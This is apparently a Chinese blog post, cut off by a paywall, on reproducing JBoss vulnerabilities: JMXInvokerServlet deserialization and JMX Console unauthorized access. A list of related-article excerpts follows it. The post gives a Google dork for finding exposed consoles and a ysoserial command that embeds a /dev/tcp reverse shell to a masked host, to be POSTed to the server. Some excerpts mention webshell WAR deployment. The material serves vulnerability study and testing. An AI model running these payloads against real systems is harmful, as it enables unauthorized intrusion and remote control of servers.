JBoss系列漏洞复现以及实战心得

最新推荐文章于 2025-05-10 07:45:59 发布
原创 最新推荐文章于 2025-05-10 07:45:59 发布 · 2.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了JBoss应用服务器的多个安全漏洞,包括JMXInvokerServlet反序列化漏洞、JMX Console未授权访问Getshell、JBossMQ JMS反序列化漏洞(CVE-2017-7504)、5.x/6.x反序列化漏洞(CVE-2017-12149)和admin-Console后台部署war包Getshell。通过漏洞复现和实战心得,讨论了环境差异、权限问题和war包部署等问题,强调了在安全测试中灵活应对不同情况的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

谷歌语法:inurl:/console/ intitle:"JBoss Management"

 

一、JBoss JMXInvokerServlet 反序列化漏洞

漏洞描述

JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。返回如下,说明接口开放,此接口存在反序列化漏洞:

漏洞版本

Jboss4.x/5.或者以下

漏洞复现:

漏洞利用结果类似CVE-2017-12149,利用ysoserial来生成ser包

java -jar ysoserial.jar CommonsCollections5 "-i >& /dev/tcp/xxxxxxx/7777 0>&1" > poc.ser

burpsuite抓包后post提交ser包即可反弹shell

 

二、JMX Console未授权访问Getshell

漏洞描述
此漏洞主要是由于JBoss中/jmx-console/HtmlAdaptor路径对外开放,并且没有任何身份验证机制,导致攻击者可以进⼊到jmx控制台,并在其中执⾏任何功能。

影响版本
Jboss4.x或者以下

漏洞复现

访问漏洞页面,

点击JMX Console后,进入到如下页面:

最低0.47元/天 解锁文章

200万优质内容无限畅学
网安漏洞复现系列漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
weixin_54626591的博客
05-06 404
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
漏洞复现实验报告
qq_45721890的博客
10-30 4106
漏洞复现实验报告 一、 概述 1.1项目背景 织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统,在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在使用该系统。 2018 年 1 月 10 日,锦行信息安全公众号公开了一个关于 DeDeCMS前台任意用户密码修
中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4649
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
jboss漏洞复现
赵花花08042的博客
12-13 792
JBoss JMXInvokerServlet 反序列化漏洞 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ https://paper.seebug.org/312/ https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的
Jboss漏洞复现
最新发布
m0_72199724的博客
05-10 631
序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObject()方法用于反序列化。问题的根源在于类ObjectInputStream在反序列化时,没有对生成的对象的类型做限制。
Jboss漏洞复现(附带修复方法)
C233333235的博客
08-07 1699
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。
JBoss漏洞复现(保姆级教学)
m0_69043895的博客
04-25 1033
漏洞原理:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞。这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码。在自己服务器上部署一个webshell的war包。然后再压缩成war文件。
漏洞复现JBoss 中间件漏洞
qq_48368964的博客
08-06 1666
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。
常见中间件漏洞复现之【Jboss】!
muyuchen110的博客
08-06 1138
Jboss介绍JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域,JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss⼴为流⾏。漏洞介绍影响范围。
漏洞复现JBoss漏洞总结
qq_45751902的博客
10-31 1879
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可。打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以。其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控。
jboss4版本修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439)升级包
04-25
jboss4版本下,jbossweb-tomcat55.sar升级包,修复Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439) 升级包中的jar来源于tomcat5.5.36 使用方法:直接替换jboss中旧的jbossweb-tomcat55.sar
JBOSS未授权漏洞详细复现
热门推荐
柠鹿的轨迹
11-06 1万+
0x00 前言 习常规而明其理,探非凡且有所见。 --涂寐 0x01 JBOSS未授权访问简介 JBOSS是一个基于J2EE的开放源代码应用服务器,也是一个管理EJB的容器和服务器,默认使用8080端口监听。 JBOSS未授权访问漏洞表现为,在默认情况下无需账密就可以直接访问 http://127.0.0.1:8080/jmx-console 进入管理控制台,进而导致网站信息泄露、服务器被上传...
Jboss CVE-2017-12149JBoss 反序列化漏洞利用
baiyongliang
06-13 2550
CVE-2017-12149 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放...
JBoss反序列化漏洞复现 CVE-2017-12149
m0_62284238的博客
09-11 618
该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。由于Runtime.getRuntime().exec()不能使用管道符等bash需要的方法,因此我们对这个bash命令进行base64编码,再让bash输出base64解码后的命令。该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化。生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可。
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
qq_40860153的博客
06-14 570
漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。2、使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,需要进行一次编码。反弹shell工具,地址:https://github.com/joaomatosf/jexboss。vulhub靶场环境: http://192.168.1.129:8080/
CVE-2017-12149JBoss 反序列化漏洞利用
weixin_30314631的博客
05-04 546
CVE-2017-12149 漏洞描述 互联网爆出JBOSSApplication Server反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。 影响范围 漏洞影响5.x和6.x版本的JBOSSAS。 漏洞原理 JBOSS Application Server是一个基于J2EE的开放源代码的应...
JBoss 相关漏洞复现及利用
weixin_45908624的博客
09-21 1420
JBoss Application Server 相关漏洞复现
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值